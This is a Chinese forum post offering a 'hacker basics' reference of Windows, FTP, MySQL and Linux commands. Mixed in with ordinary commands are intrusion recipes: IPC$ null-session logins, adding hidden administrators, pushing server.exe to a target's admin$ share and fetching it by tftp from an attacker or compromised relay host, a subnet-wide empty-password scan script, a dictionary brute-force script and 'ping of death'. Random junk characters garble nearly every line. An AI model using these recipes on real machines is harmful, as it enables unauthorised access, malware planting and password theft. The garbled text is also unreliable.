黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
' D/ j, [3 _# H% l0 O3 Z% ~net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
" I0 H1 ~6 H8 u! a# i7 Ynet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: 8 u( `  l( b' t; R/ S5 Q
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
$ F4 O) \; {' w) R, Hnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 ' Y8 n& ]' s$ |
net use h: /del 删除映射对方到本地的为H:的映射
. ]- f( Z. }* k4 m' pnet user 用户名　密码　/add 建立用户 & H! W- p( e& _4 _8 m, ^; q$ q# N
net user guest /active:yes 激活guest用户 * V' Y8 C& l3 H$ e
net user 查看有哪些用户
. N8 U4 G) P  Fnet user 帐户名 查看帐户的属性
2 ?+ B" P. }! K7 p8 Y7 d: _, A8 snet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
. ]; u4 j% X1 o1 g" u3 ]2 Z6 U# Anet start 查看开启了哪些服务
/ e) _! x8 ?6 d' {net start 服务名　 开启服务；(如:net start telnet， net start schedule) 4 k0 F) L* ?  ?* C/ j. ?( L' X
net stop 服务名 停止某服务
! v' S9 K" ]0 inet time \\目标ip 查看对方时间 2 _$ m* s( o- d: n5 ^
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 ) e- f7 P# K5 m1 Q; e! ]; {
net view 查看本地局域网内开启了哪些共享
0 B% c  U6 M8 inet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 0 n6 W$ l9 g8 w4 r2 S* V6 H* E: O2 v
net config 显示系统网络设置 ) U( l. D1 T. D, m4 W
net logoff 断开连接的共享
; S9 @- Y' X' w! inet pause 服务名 暂停某服务 ; K- t: P# L4 a, q" M
net send ip "文本信息" 向对方发信息
+ K( |( E* t# V( \  Nnet ver 局域网内正在使用的网络连接类型和信息
) ]* T# d0 ^, o) Snet share 查看本地开启的共享
. r  L* @; o0 K( hnet share ipc$ 开启ipc$共享 0 O2 ]: N" r: G# i' \
net share ipc$ /del 删除ipc$共享
3 S% a: w: e" G0 k( e6 N7 _6 qnet share c$ /del 删除C：共享 7 N  l% I" a3 ^5 H8 j
net user guest 12345 用guest用户登陆后用将密码改为12345 . }- [/ O) O( u
net password 密码 更改系统登陆密码
7 v) _" g1 E" s( s' g$ wnetstat -a 查看开启了哪些端口,常用netstat -an % p6 S* I8 p' S0 l; C/ G
netstat -n 查看端口的网络连接情况，常用netstat -an
8 F, t+ Z4 ]. i- q, a  \netstat -v 查看正在进行的工作
4 \9 _, ^6 z9 s- v* _/ Inetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） ! H: T2 Z- o9 m' B, D$ B/ Z8 [
netstat -s 查看正在使用的所有协议使用情况 , [- ?: {4 ]7 p4 _9 a# a/ A
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
' a2 ]5 K/ ~. \' ~( ~- g, Ytracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
" W+ n0 J+ o) Z: ^. g- y- s: Uping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 6 y3 b5 F9 i  p" I& L1 m
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) # M; U) I' x, l. |
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
6 D8 P) S4 {# j) \0 Y8 Rtlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) % c  s6 X, ?( l. @) E
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
% R+ N0 O- k6 S( Y0 xdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
+ ?- P! a2 a6 [' q- Cdel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
/ i; I1 G$ }% _0 v- Q2 P) emove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
- j1 [* J# n0 x; Ofc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 $ I2 S( d% t6 Q1 s2 U7 T9 c
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 * j# U1 `) S4 D  e
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
* V9 c" m" p3 |; u( P1 fat id号 /delete 停止某个已注册的计划任务   d6 W; A' w0 o$ D
at 查看所有的计划任务 . w8 r8 A4 ]% h3 v" ~: W3 z/ A
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
9 i- V+ B, ?4 H! z- }, Dfinger username @host 查看最近有哪些用户登陆
% o: F: A8 L* i+ ktelnet ip 端口 远和登陆服务器,默认端口为23
, ?) t" ?4 ^; g1 Oopen ip 连接到IP（属telnet登陆后的命令）
  w9 L+ p. ?8 E& [: o2 ptelnet 在本机上直接键入telnet 将进入本机的telnet ! u5 f! B% Q4 d5 Y
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 0 a2 u' I$ U8 V8 W8 i* O: x6 o
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
+ d6 g+ \+ _  l7 e) z3 _& W* t7 L9 n  Ycppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
2 X' L: j* B- Y2 D/ z" ecopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： ( n1 N" S/ x+ j& h' }$ {5 V: S
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
8 b  C" q# A( v  P3 Ttftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 # L: B) l& z9 g; [
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
5 E- k: p4 W, n2 p: U: i: o8 eftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
* j6 `' F! k5 M3 r8 Droute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface - U4 f4 D* K, f# o% b8 k" w  j, E
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 2 G3 f( S+ q6 t6 B, c: b6 k  ~
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
* v) }( U6 {% ~+ b% M- i% F7 Qmem 查看cpu使用情况 ) t. B4 x7 \* O% j: R
attrib 文件名(目录名) 查看某文件（目录）的属性 7 D! f0 Z, l. y% T, H
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 / [5 b" E) d# i- U/ q
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
- |, m+ f; z" {5 vdate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 2 y$ ^5 M  B0 W6 h( v& J% u
set 指定环境变量名称=要指派给变量的字符 设置环境变量
* A8 p( a) ~; b% w3 Lset 显示当前所有的环境变量
' ~$ j: n9 T% U9 D% Kset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
3 J0 H, P& u) w' q2 q; ~pause 暂停批处理程序，并显示出：请按任意键继续....
+ k# r% R9 a$ G2 o/ l% Uif 在批处理程序中执行条件处理（更多说明见if命令及变量） 7 x+ b8 Z4 z) c) d1 g8 A
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） : C5 G. y! _+ Z. p
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）   Y! |- o2 L! c- L& m, h' S
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） & u# |3 [. C- X) n
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置   K2 q9 f: J2 o; j2 O- u! z+ }
echo 信息 在屏幕上显示出信息 , q  P$ B+ }9 e6 ^. E) W
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
  A; ?" T+ z, b! T0 g3 Vfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
2 g; i% r/ U6 {( hfind 文件名 查找某文件 . i7 P0 c5 T0 |, D# S0 x
title 标题名字 更改CMD窗口标题名字 $ o, a' y) }; j2 G% U
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 8 {# p+ F# u# k( k
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
$ _4 c! @5 c& m" y3 @print 文件名 打印文本文件
: A, s, T  C% E0 Pver 在DOS窗口下显示版本信息 ! \- t' v$ y6 b1 k3 Y
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
/ g! Z% S4 A  L( S4 h% xformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
2 Q. `  k5 P' X/ [md　目录名 创建目录 / k2 D( h+ R9 {+ b) D/ `
replace 源文件　要替换文件的目录 替换文件 1 ~: K4 h1 _9 K: O& `
ren 原文件名　新文件名 重命名文件名 . \/ l" h" t2 g6 L. T. ~
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 * Q. @0 z2 r3 n9 c
type 文件名 显示文本文件的内容
# R0 m- F7 ]) m4 Emore 文件名 逐屏显示输出文件
# g: j9 T; y2 o+ ?3 {( [$ ~4 _doskey 要锁定的命令＝字符
/ D$ a* n9 ^% B. c5 X2 Hdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= & s: m+ s  k1 B( p, Z' \+ H/ v
taskmgr 调出任务管理器 5 K, i/ c, K. R* Y. I4 G) e
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
1 n. C# \" w, ftlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
# P9 h3 ~# m# \# Eexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe # [- v  z3 A! ]# u! Q
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 ) c2 d' U/ j) s
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? 9 d- z4 g- d' B& n7 z
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
- v* e' f5 s) z' Oregedit /e 注册表文件名 导出注册表
1 e1 \2 D# E0 m+ H6 Ocacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 8 e  `' J1 P0 f" C- e- `
cacls 文件名 查看文件的访问用户权限列表
( A6 J1 @. r" IREM 文本内容 在批处理文件中添加注解
  E& g% ~4 j2 p! `$ v* ^3 C- Tnetsh 查看或更改本地网络配置情况
2 l1 T5 R* a; S+ {; y& JIIS服务命令：) z% n8 q+ ~- D  ?" B- Z8 S
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
3 U3 U3 Y6 u8 Miisreset /start或stop 启动（停止）所有Internet服务
" Q6 q0 L6 Y/ h3 t; |9 Ciisreset /restart 停止然后重新启动所有Internet服务
, }6 w* F- _$ [0 Q9 H& C. A; h+ Diisreset /status 显示所有Internet服务状态
/ V" a# Q; m5 g: e3 ]iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 ; R  Y& m, w( F+ H
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
9 m, `- M* Z# p# X9 C( g! g. Xiisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
3 W3 i! M2 g5 c" V# b  a6 Qiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 % J3 u$ n& b7 T8 |$ h
FTP 命令： (后面有详细说明内容)
# D! j9 D9 V. z0 pftp的命令行格式为:0 }) H( {! \# J+ n% u
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
& K/ R% }) t1 `; u/ M/ j－d 使用调试方式。
2 r0 M7 d5 r% W2 g" p" X1 }/ u－n 限制ftp的自动登录,即不使用.netrc文件。; I* E& p; {/ X4 o! m1 ~
－g 取消全局文件名。 + ?9 h: j) f! X: M5 s
help [命令] 或 ？[命令] 查看命令说明
$ a9 W# W8 H5 q0 S9 g4 C, mbye 或 quit 终止主机FTP进程,并退出FTP管理方式.
; \9 d7 F0 M* ?7 l3 |* M4 zpwd 列出当前远端主机目录 6 Y3 r+ [, s. ]& w0 @3 P. q% V
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
* f/ v, Y/ ]" f. ^4 U, Q2 k0 \get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
9 v3 {4 F1 Y* {2 j, Mmget [remote-files] 从远端主机接收一批文件至本地主机
2 w: ?# e/ |6 d5 c$ ]mput local-files 将本地主机中一批文件传送至远端主机 ' ~( b7 ^# z! ]8 J
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
2 m: P2 e6 c" |( y3 D9 v( Nascii 设定以ASCII方式传送文件(缺省值) 8 Q$ f  K, H, _) K. U5 D. l4 C
bin 或 image 设定以二进制方式传送文件 0 T4 y0 y) ?. e* y
bell 每完成一次文件传送,报警提示
* t; Z$ _9 m4 N: scdup 返回上一级目录 + O4 B% ?8 Z* C7 x# G0 F
close 中断与远程服务器的ftp会话(与open对应) # D( b* E4 }+ N) y" E; F* m
open host[port] 建立指定ftp服务器连接,可指定连接端口
' U, |+ ~& M+ P& Hdelete 删除远端主机中的文件 0 N+ q5 \0 _, u7 g) ?  i
mdelete [remote-files] 删除一批文件
8 P9 W8 D2 r: G" m# `mkdir directory-name 在远端主机中建立目录
+ r$ L2 A# z& D4 c& A  \rename [from] [to] 改变远端主机中的文件名
  k9 |+ u; s+ m: y& p7 O0 zrmdir directory-name 删除远端主机中的目录
2 Z9 {4 l- C2 r# ]0 e# Mstatus 显示当前FTP的状态
9 W( w! ^. s0 n3 a. |7 g0 h- X  zsystem 显示远端主机系统类型
' {' H1 c: m  m0 Vuser user-name [password] [account] 重新以别的用户名登录远端主机 3 A- [6 T4 g" y& `# T4 l
open host [port] 重新建立一个新的连接
: Q6 d& A+ o: `* X, `prompt 交互提示模式 $ c5 ?6 y$ Z  x/ O0 [0 t
macdef 定义宏命令
2 l' _% K' I- P! S7 m4 A8 Q7 Wlcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
) o8 z6 D; R6 k7 G  s( d; K- e/ fchmod 改变远端主机的文件权限 & I3 o) }' F0 g# D* g& U! u
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
/ F8 M5 t9 B. X+ bcd remote－dir 进入远程主机目录 $ J7 y+ w3 @4 _% s, k: z+ S
cdup 进入远程主机目录的父目录 % S' X) g0 N1 @6 r6 w. n6 _; s
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
- Q' i9 M, }, i8 UMYSQL 命令：
) M  {: S3 A5 g+ ]2 r, T! l  m8 `mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
2 j" Q9 f* ]( I* ~（例：mysql -h110.110.110.110 -Uroot -P123456 $ m, r) p  ~( {3 v* k) G* M$ J9 c
注:u与root可以不用加空格，其它也一样）
( R: G* b. k: jexit 退出MYSQL ) u1 m, H1 ]1 v# h: b: o6 v
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
7 Q1 r) I  S: D0 kgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） 5 N. j4 n1 x3 y' V( _1 B
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
1 K& |; Q. l! Q% G$ luse mysql；
1 D1 f; T. A" G9 {show tables; 显示库中的数据表
+ h8 }  l' L5 l2 A# wdescribe 表名; 显示数据表的结构
7 e% y7 R$ D3 W6 P" y+ `: n+ Vcreate database 库名; 建库
# c" W; C+ ^" ?- u# I9 I; `) @use 库名；
  a2 C3 e5 b& [- _create table 表名 (字段设定列表)； 建表 # I7 J0 h/ j5 X' `1 n
drop database 库名;
& i0 E5 s1 r* i$ n6 y1 C" cdrop table 表名； 删库和删表 / N! [9 D" M. r  B, e
delete from 表名; 将表中记录清空
8 \& x- ]- P. N4 a, Rselect * from 表名; 显示表中的记录
$ K" h+ j* V, p5 B  i' ^! l! i* Gmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 ' Q5 ^; X$ L9 m1 E1 g- x: I$ h" c
win2003系统下新增命令（实用部份）：
( E; _" T. e! z+ H6 _* N/ d, gshutdown /参数 关闭或重启本地或远程主机。
. ^% t& G' O* P* {& j# ~( d参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。: U1 \% K( ^+ a( m3 B: t* j
例：shutdown /r /t 0 立即重启本地主机（无延时）
9 L- K( q. V, k, m: V7 a- b# staskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
3 u" z. s! \2 R+ w! {! e参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 9 z# Z' x& Q/ K& n3 B4 B, I* ~$ M% P
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。" \: |: E+ |$ J4 u! Z
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程' w( B' S7 c/ j; ~- V0 \) u
Linux系统下基本命令： 要区分大小写, \6 R$ D  P/ S( [* Q
uname 显示版本信息（同win2K的 ver） ; v3 ]9 s8 Z4 r2 D6 i6 H
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
% |# ^0 |7 b; m( g: Wpwd 查询当前所在的目录位置 % n  l; ?" G% N! h, O. W
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
' ]: x) F$ N$ tcat 文件名 查看文件内容 , h& m# T4 B* k4 K& i. K8 Z1 E
cat >abc.txt 往abc.txt文件中写上内容。
2 a& u5 T$ {3 I3 v. ^) u9 wmore 文件名 以一页一页的方式显示一个文本文件。 , @6 q- c8 `4 a6 S7 J
cp 复制文件
7 H( m7 I; r+ ~+ U' Q, \+ `7 o3 Zmv 移动文件
# n$ r  x# w. b- ^4 @0 d! Drm 文件名 删除文件，rm -a 目录名删除目录及子目录
7 j1 d- R* r8 \  x+ L; V0 rmkdir 目录名 建立目录
& i/ ?& {* s, [rmdir 删除子目录，目录内没有文档。 2 t. L! K0 k* u- q
chmod 设定档案或目录的存取权限
+ J5 i  ?. m4 V3 o$ v* G8 E0 K: Z" ogrep 在档案中查找字符串
1 y3 q' _: [) J2 U2 y: Ldiff 档案文件比较 % ~3 U( C# v3 }6 x0 g2 v/ u1 ^; e
find 档案搜寻
' R9 O. F( f" d$ R+ d8 s. ~date 现在的日期、时间 7 \& m; N0 a1 O5 L/ L3 ]
who 查询目前和你使用同一台机器的人以及Login时间地点
3 T* Y; V5 ]/ C& vw 查询目前上机者的详细资料
; q& E  {, O! r# }whoami 查看自己的帐号名称
! j+ K  b0 n5 s7 K: k; ogroups 查看某人的Group
2 ~! [& l4 V# }$ O2 g; S+ upasswd 更改密码
  ]5 M; x9 \* Lhistory 查看自己下过的命令 * n, X% r) B& t/ Z, S$ [
ps 显示进程状态
: l7 J+ W6 d! o/ Ukill 停止某进程
3 A+ [8 M$ G/ Z4 Sgcc 黑客通常用它来编译C语言写的文件
# J6 v6 i. H' o1 |2 g4 fsu 权限转换为指定使用者
0 y) A/ d- d; n: J* dtelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
( v% i: i7 x2 H1 c. S6 A/ m3 Nftp ftp连接上某服务器（同win2K
- T4 u' T0 t8 y, z; Y附：批处理命令与变量# l- z, v( a2 m  O& V3 i/ X& k
1：for命令及变量 基本格式： ) }- S) K9 k3 Z# R& E: ?8 ?* A/ q6 t* g
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
% a1 h8 ?! N- N/ _9 h3 u  U批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
2 Y; h" ~% d% ?& C  Q( V# L! O& @- P(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
9 c. j% p" e- @* W6 Lcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开  Q1 E# Q; t: K0 B9 B
command_parameters：为特定命令指定参数或命令行开关% n4 J& ]& z2 `7 D6 O' }
IN (set)：指在(set)中取值；DO command ：指执行command
0 l/ U! k" n- i, {- L4 G3 U. G参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
3 B, @7 F) q" R4 e3 i# u  N用法举例：
" {5 X. d  g# M3 n/ K@echo off ' \/ b# J- `% A6 ]$ Y% t
echo 用法格式：test.bat *.*.* > test.txt
1 }: x/ M/ l' d3 c/ `! jfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt 5 C$ P! }7 D7 z; U# C, I0 y% Q
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
; h- o$ c' W) b! x3 }0 n( T) I9 h# I/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 & A6 q- k9 ~, g' i
@echo off ) v8 K, V; C& i. J2 Z* `
echo 用法格式：ok.bat ip 3 x; v$ j1 ?6 z/ e
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
. F2 o8 C4 p) \; @! _/ W% ]6 M存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。2 u$ `* d% k$ a; X1 z. s) C, m4 W
2：if命令及变量 基本格式：
& J8 C3 Z' a( J# i5 c8 o+ v, T9 z; S% HIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
8 V, n! n+ B5 d8 @' B; h2 ^7 G例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。& [( Z9 J& [( G0 }2 I
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 9 ]% ]- a8 S7 y' K+ p* R: I9 \
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。' {( W4 n. V" _( u' K& k6 S' o
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） 5 X5 O# O: u, n2 @* {: z5 a
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。* W5 E& L; R2 f) ]0 k
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 ' S6 {( ~9 o0 {3 F; B" `% }
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”